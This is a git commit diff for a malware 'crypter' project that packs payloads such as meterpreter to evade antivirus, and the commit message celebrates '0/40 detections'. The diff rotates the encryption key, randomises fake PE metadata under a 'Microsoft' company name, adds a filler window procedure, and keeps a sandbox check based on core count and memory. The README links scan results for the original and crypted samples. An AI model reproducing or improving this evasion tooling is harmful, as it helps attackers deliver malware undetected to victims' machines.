fix: now at 0/40 detections back again

2024-03-19 09:02:32 +01:00
parent 1d74de9a6e
commit 4d6b376c03
5 changed files with 30 additions and 14 deletions
--- a/Builder/obfuscation.py
+++ b/Builder/obfuscation.py
@@ -198,7 +198,7 @@ def obfuscate(PASS, CFLOW_PASS, cflow, junk) :
                if "/*" in line : in_comment = True
                elif "*/" in line : in_comment = False
                if "switch" in line : in_switch = True
-                elif in_switch and "}" in line : in_switch = False
+                elif in_switch and "}" in line and not "case" in line and not "default" in line : in_switch = False
                if "__asm" in line : in_asm = True
                elif in_asm and "}" in line : in_asm = False
                if "// Your code here" in line :
--- a/Crypter/config.h
+++ b/Crypter/config.h
@@ -1,2 +1,2 @@
 #pragma once
-#define KEY "ouhuoqhzdb"
+#define KEY "mkhjqsdhfjbzqfcqzf"
--- a/Crypter/main.cpp
+++ b/Crypter/main.cpp
@@ -207,6 +207,24 @@ void allo() {
 	//END
 }

+LRESULT CALLBACK WindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam) {
+    //START
+    switch (uMsg) {
+        case WM_DESTROY:
+            PostQuitMessage(0);
+            return 0;
+        case WM_PAINT: {
+            PAINTSTRUCT ps;
+            HDC hdc = BeginPaint(hwnd, &ps);
+            FillRect(hdc, &ps.rcPaint, (HBRUSH) (COLOR_WINDOW + 1));
+            EndPaint(hwnd, &ps);
+            return 0;
+        } default:
+            return DefWindowProc(hwnd, uMsg, wParam, lParam);
+    }
+    //END
+}
+
 #ifdef _DEBUG
 int main(void)
 #else
@@ -220,20 +238,20 @@ int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR     lpCm

    DEBUG_PRINTF("[+] Started\n");

-    MEMORYSTATUSEX memoryStatus;
+    MEMORYSTATUSEX memoryStatus = { 0 };
    memoryStatus.dwLength = sizeof(memoryStatus);
    GlobalMemoryStatusEx(&memoryStatus);
    ULONGLONG totalPhysicalMemory = memoryStatus.ullTotalPhys;

-    // Convert total physical memory to gigabytes
    double totalPhysicalMemoryGB = static_cast<double>(totalPhysicalMemory) / (1024 * 1024 * 1024);

-    // Get the number of processor cores
    SYSTEM_INFO systemInfo;
    GetSystemInfo(&systemInfo);
    DWORD numProcessorCores = systemInfo.dwNumberOfProcessors;
-    if (numProcessorCores < 2 || (int)totalPhysicalMemoryGB < 4)
+    if (numProcessorCores < 2 || (int)totalPhysicalMemoryGB < 4) {
+        MessageBoxA(NULL, "uwu", "failed", 0);
        return 0;
+    }

    const int bufferSize = sizeof(sample) / sizeof(sample[0]);
 	
--- a/Crypter/patate-crypter.rc
+++ b/Crypter/patate-crypter.rc
@@ -68,12 +68,12 @@ BEGIN
        BLOCK "040c04b0"
        BEGIN
 			VALUE "CompanyName", "Microsoft"
-			VALUE "FileDescription", "qgfozummtzttkchjglkz"
+			VALUE "FileDescription", "clgdknugqsthezarlwbq"
 			VALUE "FileVersion", "1.0.0.1"
-			VALUE "InternalName", "oiablyy.exe"
+			VALUE "InternalName", "yhoqres.exe"
 			VALUE "LegalCopyright", "Copyright (C) 2023"
-			VALUE "OriginalFilename", "tmzponf.exe"
-			VALUE "ProductName", "oeozjqg.exe"
+			VALUE "OriginalFilename", "erbggay.exe"
+			VALUE "ProductName", "awwmoqx.exe"
            VALUE "ProductVersion", "1.0.0.1"
        END
    END
--- a/README.md
+++ b/README.md
@@ -5,15 +5,13 @@ I will not provide any support for running the program, it is only made for peop

 # Limitations
 patate crypter officially supports 32bit DLLs and PEs. It might be possible to add x64 bit support without too much issues, but i never tried, maybe one day.<br>
-The crypter will link the library dynamically by default because statically linking the MSVC default librairies cuases the detections to go from 0/40 to 5/40 (see below).<br>
 There is an issue where the reallocations would fail for specific payloads, TOFIX.<br>
 There is code in the `metadata.py` file to generate random BMP images in the metadata of the PE but it makes the entropy go way to high (from 6.4 to 7.4) (see [link](https://practicalsecurityanalytics.com/file-entropy/)).

 # Detection rate
 There is currently 0/40 detections for a crypted meterperter :
- [original](https://kleenscan.com/scan_result/c6ee0a65f7b88ff709b003357ba9e21a2c1488ad7c6f2314d00bdae45d542df8)
- [crypted (dynamically linked)](https://kleenscan.com/scan_result/be8a5e779c0269d2a87d9345118e180162852c4ed70e18f17838da8f879e87ae)
- [crypted (statically linked)](https://kleenscan.com/scan_result/0b65052a51ce5d3f7807fdae4c7ffc1c45f2868ab41f9073c3bd479b2c86b2a8)
+- [original meterpreter](https://www.kleenscan.com/scan_result/6ea55d54a947393082f524215c28185ef90a7ec9cb9c50f25c555715b61b0e3e)
+- [crypted](https://www.kleenscan.com/scan_result/697277eeddc7cf01ffc81430e3c549488e3a96970edb9ec8d96860d9135eac54)

 # How does it work ?
 The crypter (compile time) works by :